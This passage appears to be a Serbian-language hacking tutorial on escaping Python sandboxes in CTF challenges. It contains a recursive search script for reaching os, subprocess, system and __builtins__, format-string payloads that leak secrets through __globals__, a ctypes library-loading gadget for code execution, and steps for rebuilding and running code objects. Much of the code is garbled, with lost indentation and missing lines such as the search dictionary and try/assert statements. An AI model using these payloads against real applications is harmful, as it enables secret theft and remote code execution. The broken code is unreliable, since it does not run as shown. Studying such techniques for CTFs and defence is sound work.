Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close

Rekurzivno pretraživanje Builtins, Globals...

Ovo je jednostavno neverovatno. Ako tražite objekat poput globals, builtins, open ili bilo čega samo koristite ovaj skript da rekurzivno pronađete mesta gde možete pronaći taj objekat.

import os, sys # Import these to find more gadgets

# Misc
"__globals__": set(),
"builtins": set(),
"__builtins__": set(),
"open": set(),

# RCE libs
"os": set(),
"subprocess": set(),
"commands": set(),
"pty": set(),
"importlib": set(),
"imp": set(),
"sys": set(),
"pip": set(),
"pdb": set(),

# RCE methods
"system": set(),
"popen": set(),
"getstatusoutput": set(),
"getoutput": set(),
"call": set(),
"Popen": set(),
"popen": set(),
"spawn": set(),
"import_module": set(),
"__import__": set(),
"load_source": set(),
"execfile": set(),
"execute": set()

#More than 4 is very time consuming

#The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found

def check_recursive(element, cont, name, orig_n, orig_i, execute):
# If bigger than maximum, stop
if cont > MAX_CONT:

# If already checked, stop
#if name and name in ALREADY_CHECKED:
#    return

# Add to already checked
#if name:
#    ALREADY_CHECKED.add(name)

# If found add to the dict
for k in SEARCH_FOR:
if k in dir(element) or (type(element) is dict and k in element):
SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}")

# Continue with the recursivity
for new_element in dir(element):
check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute)

# WARNING: Calling random functions sometimes kills the script
# Comment this part if you notice that behaviour!!
if execute:
if callable(getattr(element, new_element)):
check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute)


# If in a dict, scan also each key, very important
if type(element) is dict:
for new_element in element:
check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i)

def main():
print("Checking from empty string...")
total = [""]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Empty str {i}", True)

print("Checking loaded subclasses...")
total = "".__class__.__base__.__subclasses__()
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Subclass {i}", True)

print("Checking from global functions...")
total = [print, check_recursive]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Global func {i}", False)


if __name__ == "__main__":

Možete proveriti izlaz ovog skripta na ovoj stranici:

Python Format String

Ako pošaljete string u python koji će biti formatiran, možete koristiti {} da pristupite internim informacijama u python-u. Možete koristiti prethodne primere da pristupite globalnim ili ugrađenim funkcijama, na primer.

# Example from
"KEY": "ASXFYFGK78989"

class PeopleInfo:
def __init__(self, fname, lname):
self.fname = fname
self.lname = lname

def get_name_for_avatar(avatar_str, people_obj):
return avatar_str.format(people_obj = people_obj)

people = PeopleInfo('GEEKS', 'FORGEEKS')

st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)

Napomena kako možete pristupiti atributima na normalan način sa tačkom kao people_obj.__init__ i elementu rečnika sa zagradama bez navodnika __globals__[CONFIG]

Takođe, napomena da možete koristiti .__dict__ za enumeraciju elemenata objekta get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)

Neke druge zanimljive karakteristike format stringova su mogućnost izvršavanja funkcija str, repr i ascii u naznačenom objektu dodavanjem !s, !r, !a respektivno:

st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)

Pored toga, moguće je kodirati nove formatere u klasama:

class HAL9000(object):
def __format__(self, format):
if (format == 'open-the-pod-bay-doors'):
return "I'm afraid I can't do that."
return 'HAL 9000'

#I'm afraid I can't do that.

Više primera o format string primerima može se naći na

Proverite takođe sledeću stranicu za gadgete koji će rešiti osetljive informacije iz Python internih objekata:

Python Internal Read Gadgets

Osetljive informacije o otkrivanju payload-a


# Access an element through several links

# Example from
secret_variable = "clueless"
x = new_user.User(username='{i.find.__globals__[so].mapperlib.sys.modules[__main__].secret_variable}',password='lol')
str(x) # Out: clueless

Od formata do RCE učitavanje biblioteka

Prema TypeMonkey izazovu iz ovog izveštaja, moguće je učitati proizvoljne biblioteke sa diska zloupotrebom ranjivosti format string u pythonu.

Kao podsetnik, svaki put kada se izvrši neka akcija u pythonu, neka funkcija se izvršava. Na primer, 2*3 će izvršiti (2).mul(3) ili {'a':'b'}['a'] će biti {'a':'b'}.__getitem__('a').

Imate više ovakvih u sekciji Python izvršenje bez poziva.

Ranjivost format string u pythonu ne omogućava izvršavanje funkcije (ne dozvoljava korišćenje zagrada), tako da nije moguće dobiti RCE kao '{0.system("/bin/sh")}'.format(os). Međutim, moguće je koristiti []. Stoga, ako neka uobičajena python biblioteka ima __getitem__ ili __getattr__ metodu koja izvršava proizvoljan kod, moguće je zloupotrebiti ih da se dobije RCE.

Tražeći takav gadget u pythonu, izveštaj predlaže ovu Github pretragu. Gde je pronašao ovu jednu:

class LibraryLoader(object):
def __init__(self, dlltype):
self._dlltype = dlltype

def __getattr__(self, name):
if name[0] == '_':
raise AttributeError(name)
dll = self._dlltype(name)
except OSError:
raise AttributeError(name)
setattr(self, name, dll)
return dll

def __getitem__(self, name):
return getattr(self, name)

cdll = LibraryLoader(CDLL)
pydll = LibraryLoader(PyDLL)

Ovaj uređaj omogućava učitavanje biblioteke sa diska. Stoga, potrebno je na neki način napisati ili otpremiti biblioteku za učitavanje ispravno kompajliranu na napadnuti server.


Izazov zapravo zloupotrebljava drugu ranjivost na serveru koja omogućava kreiranje proizvoljnih fajlova na disku servera.

Istraživanje Python objekata

Ako želite da naučite o python bytecode detaljno, pročitajte ovaj sjajan post o toj temi:

U nekim CTF-ovima možete dobiti ime prilagođene funkcije u kojoj se nalazi flag i morate da pogledate unutrašnjost funkcije da biste ga izvukli.

Ovo je funkcija koju treba ispitati:

def get_flag(some_input):
if some_input == var2:
return "THIS-IS-THE-FALG!"
return "Nope"


dir() #General dir() to find what we have loaded
['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']
dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']


__globals__ i func_globals (isto) Dobija globalno okruženje. U primeru možete videti neke uvezene module, neke globalne promenljive i njihov sadržaj koji su deklarisani:

{'b': 3, 'names': ('open', 'read'), '__builtins__': <module '__builtin__' (built-in)>, 'codeobj': <code object <module> at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': <function get_flag at 0x7f58c00b27d0>, 'filename': './', '__package__': None, 'read': <function read at 0x7f58c00b23d0>, 'code': <type 'code'>, 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './', 'r'), 'x': <unbound method catch_warnings.__init__>, '__name__': '__main__', 'foo': <function foo at 0x7f58c020eb50>, '__doc__': None, 'dis': <module 'dis' from '/usr/lib/python2.7/dis.pyc'>}

#If you have access to some variable value

Pogledajte ovde više mesta za dobijanje globals

Pristupanje kodu funkcije

__code__ i func_code: Možete pristupiti ovom atributu funkcije da dobijete objekat koda funkcije.

# In our current example
<code object get_flag at 0x7f9ca0133270, file "<stdin>", line 1

# Compiling some python code
compile("print(5)", "", "single")
<code object <module> at 0x7f9ca01330c0, file "", line 1>

#Get the attributes of the code object
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']

Dobijanje informacija o kodu

# Another example
s = '''
a = 5
b = 'text'
def f(x):
return x
c=compile(s, "", "exec")

# __doc__: Get the description of the function, if any

# co_consts: Constants
(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')

c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None.
(5, 'text', <code object f at 0x7f9ca0133540, file "", line 4>, 'f', None

# co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects.

('a', 'b', 'f')

#co_varnames: Local names used by the bytecode (arguments first, then the local variables)
('some_input', 'var1', 'var2', 'var3')

#co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions.

#co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function.

#Get bytecode

Rastavljanje funkcije

import dis
2           0 LOAD_CONST               1 (1)
3 STORE_FAST               1 (var1)

3           6 LOAD_CONST               2 ('secretcode')
9 STORE_FAST               2 (var2)

4          12 LOAD_CONST               3 ('some')
15 LOAD_CONST               4 ('array')
18 BUILD_LIST               2
21 STORE_FAST               3 (var3)

5          24 LOAD_FAST                0 (some_input)
27 LOAD_FAST                2 (var2)
30 COMPARE_OP               2 (==)
33 POP_JUMP_IF_FALSE       40

6          36 LOAD_CONST               5 ('THIS-IS-THE-FLAG!')

8     >>   40 LOAD_CONST               6 ('Nope')
44 LOAD_CONST               0 (None)

Napomena da ako ne možete da uvezete dis u python sandboxu možete dobiti bajt kod funkcije (get_flag.func_code.co_code) i dezintegrisati ga lokalno. Nećete videti sadržaj varijabli koje se učitavaju (LOAD_CONST), ali ih možete pretpostaviti iz (get_flag.func_code.co_consts) jer LOAD_CONST takođe pokazuje offset varijable koja se učitava.

0 LOAD_CONST          1 (1)
3 STORE_FAST          1 (1)
6 LOAD_CONST          2 (2)
9 STORE_FAST          2 (2)
12 LOAD_CONST          3 (3)
15 LOAD_CONST          4 (4)
18 BUILD_LIST          2
21 STORE_FAST          3 (3)
24 LOAD_FAST           0 (0)
27 LOAD_FAST           2 (2)
30 COMPARE_OP          2 (==)
36 LOAD_CONST          5 (5)
>>   40 LOAD_CONST          6 (6)
44 LOAD_CONST          0 (0)

Kompajliranje Pythona

Sada, zamislite da nekako možete izvući informacije o funkciji koju ne možete izvršiti ali vam treba da je izvršite. Kao u sledećem primeru, možete pristupiti kod objektu te funkcije, ali samo čitajući disasembler ne znate kako da izračunate flag (zamislite složeniju calc_flag funkciju)

def get_flag(some_input):
def calc_flag(flag_rot2):
return ''.join(chr(ord(c)-2) for c in flag_rot2)
if some_input == var2:
return calc_flag("VjkuKuVjgHnci")
return "Nope"

Creating the code object

Prvo, moramo znati kako da kreiramo i izvršimo kod objekat kako bismo mogli da kreiramo jedan za izvršavanje naše funkcije leak:

code_type = type((lambda: None).__code__)
# Check the following hint if you get an error in calling this
code_obj = code_type(co_argcount, co_kwonlyargcount,
co_nlocals, co_stacksize, co_flags,
co_code, co_consts, co_names,
co_varnames, co_filename, co_name,
co_firstlineno, co_lnotab, freevars=None,

# Execution
eval(code_obj) #Execute as a whole script

# If you have the code of a function, execute it
mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")

U zavisnosti od verzije Pythona, parametri code_type mogu imati drugačiji redosled. Najbolji način da saznate redosled parametara u verziji Pythona koju koristite je da pokrenete:

import types
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n      flags, codestring, constants, names, varnames, filename, name,\n      firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object.  Not for the faint of heart.'

Ponovno kreiranje provaljene funkcije

U sledećem primeru, uzet ćemo sve podatke potrebne za ponovno kreiranje funkcije direktno iz objekta koda funkcije. U pravom primeru, sve vrednosti za izvršavanje funkcije code_type su ono što ćete morati da provalite.

fc = get_flag.__code__
# In a real situation the values like fc.co_argcount are the ones you need to leak
code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars)

mydict = {}
mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")

Bypass Defenses

U prethodnim primerima na početku ovog posta, možete videti kako izvršiti bilo koji python kod koristeći compile funkciju. Ovo je zanimljivo jer možete izvršiti cele skripte sa petljama i svime u jednoj liniji (i mogli bismo učiniti isto koristeći exec). U svakom slučaju, ponekad bi moglo biti korisno napraviti kompilovani objekat na lokalnoj mašini i izvršiti ga na CTF mašini (na primer, zato što nemamo compiled funkciju u CTF-u).

Na primer, hajde da ručno kompajliramo i izvršimo funkciju koja čita ./

def read():
return open("./",'r').read()

#On Remote
function_type = type(lambda: None)
code_type = type((lambda: None).__code__) #Get <type 'type'>
consts = (None, "./", 'r')
bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S'
names = ('open','read')

# And execute it using eval/exec
eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ()))

#You could also execute it directly
mydict = {}
mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()

Ako ne možete pristupiti eval ili exec, možete kreirati pravu funkciju, ali direktno pozivanje obično će propasti sa: konstruktor nije dostupan u ograničenom režimu. Dakle, potrebna vam je funkcija koja nije u ograničenom okruženju da pozove ovu funkciju.

#Compile a regular print
ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})

Decompiling Compiled Python

Korišćenjem alata kao što je može se dekompilirati dati kompajlirani python kod.

Pogledajte ovaj tutorijal:

Decompile compiled python binaries (exe, elf) - Retreive from .pyc

Misc Python


Python koji se izvršava sa optimizacijama sa parametrom -O će ukloniti assert izjave i bilo koji kod uslovljen vrednošću debug. Stoga, provere kao što su

def check_permission(super_user):
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")

will be bypassed


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